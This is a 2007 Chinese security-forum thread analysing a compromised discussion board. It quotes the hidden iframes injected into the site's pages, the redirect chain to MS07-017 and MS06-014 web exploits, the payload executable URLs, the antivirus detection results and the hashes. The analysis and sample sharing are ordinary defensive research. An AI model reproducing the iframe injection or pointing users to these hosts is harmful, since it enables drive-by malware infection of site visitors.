又一个挂马的——xunchi论坛

显示全部楼层 · 发表于 2007-5-17 11:57:12

根据剑盟的astre提供的信息，找到了这个被挂马的论坛（http://bbs.xunchi.org/）；
注：突然发现原来astre也在卡饭这里发贴了……

——————————————————————————————————————————————————————————————

源码最下面被iframe上了http://www.hardup.cn/，里面有代码：
<IFRAME src="http://61.152.169.194/sysqq.htm" width=100 height=0></IFRAME>
<IFRAME src="http://www.almeo.cn/people.htm" width=0 height=0></IFRAME>

——————————————————————————————————————————————————————————————

http://61.152.169.194/sysqq.htm：
里面根据操作系统（XP，2003，2000）自动跳转到不同的页面：
XP：http://61.152.169.194/baobao.htm
2003：http://61.152.169.194/06014.htm
2000：http://61.152.169.194/banner.htm
baobao.htm里面为一个MS07-017网马（http://61.152.169.194/ani.c）；
06014.htm看名字就知道是MS06-014网马了；
这个两个都是挂了http://61.152.196.194/007.exe；（连接不上……）
而banner.htm是一个人为制作的“找不到服务器”的提示页，上面居然什么毒也没有？！

——————————————————————————————————————————————————————————————

http://www.almeo.cn/people.htm是一个MS06-014网马，挂了http://love.5d6h.cn/ai/soft/cj.exe；
报毒的杀软数量一般般啦：

AhnLab-V3	2007.5.16.1	05.16.2007	Win32/NSAnti.suspicious
AntiVir	7.4.0.23	05.16.2007	HEUR/Crypted
Authentium	4.93.8	05.16.2007	no virus found
Avast	4.7.997.0	05.16.2007	Win32:Agent-DSC
AVG	7.5.0.467	05.16.2007	no virus found
BitDefender	7.2	05.17.2007	Trojan.Popwin.CE
CAT-QuickHeal	9.00	05.16.2007	(Suspicious) - DNAScan
ClamAV	devel-20070416	05.16.2007	no virus found
DrWeb	4.33	05.16.2007	no virus found
eSafe	7.0.15.0	05.16.2007	suspicious Trojan/Worm
eTrust-Vet	30.7.3638	05.17.2007	no virus found
Ewido	4.0	05.16.2007	no virus found
FileAdvisor	1	05.17.2007	no virus found
Fortinet	2.85.0.0	05.17.2007	suspicious
F-Prot	4.3.2.48	05.16.2007	no virus found
F-Secure	6.70.13030.0	05.17.2007	no virus found
Ikarus	T3.1.1.7	05.16.2007	Backdoor.Win32.Hupigon.BV
Kaspersky	4.0.2.24	05.17.2007	no virus found
McAfee	5032	05.16.2007	no virus found
Microsoft	1.2503	05.17.2007	VirTool:Win32/Obfuscator.A
NOD32v2	2272	05.17.2007	a variant of Win32/Agent.NEO
Norman	5.80.02	05.16.2007	no virus found
Panda	9.0.0.4	05.16.2007	Suspicious file
Prevx1	V2	05.17.2007	no virus found
Sophos	4.17.0	05.16.2007	no virus found
Sunbelt	2.2.907.0	05.17.2007	VIPRE.Suspicious
Symantec	10	05.17.2007	no virus found
TheHacker	6.1.6.115	05.15.2007	no virus found
VBA32	3.12.0	05.16.2007	no virus found
VirusBuster	4.3.7:9	05.16.2007	no virus found
Webwasher-Gateway	6.0.1	05.17.2007	Heuristic.Crypted

Aditional Information

File size: 19090 bytes

MD5: 6f3919aaa65e6b76f68a8fcaab1a1b09

SHA1: 1717279eb812b90f8c9fb302aa6c8c3d34d465bb

packers: NsPack, NsPack

packers: NSPack, PE_Patch

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

——————————————————————————————————————————————————————————————

样本密码virus

[ 本帖最后由 dikex 于 2007-5-17 12:01 编辑 ]

显示全部楼层 · 发表于 2007-5-17 12:02:30

貌似前几天已经发过了这个样本

显示全部楼层 · 发表于 2007-5-17 12:10:47

detected: virus Trojan.Generic (modification) File: C:\Documents and Settings\Owner\×ÀÃæ\cj.rar/cj.exe

显示全部楼层 · 发表于 2007-5-17 12:35:33

进去之后MCAFEE没动静

显示全部楼层 · 发表于 2007-5-17 12:36:14

packers: NsPack, NsPack
packers: NSPack, PE_Patch

显示全部楼层 · 发表于 2007-5-17 17:48:49

微点杀鸟

显示全部楼层 · 发表于 2007-5-17 18:00:05

改时间的东东

[病毒样本] 又一个挂马的——xunchi论坛

本帖子中包含更多资源

本帖子中包含更多资源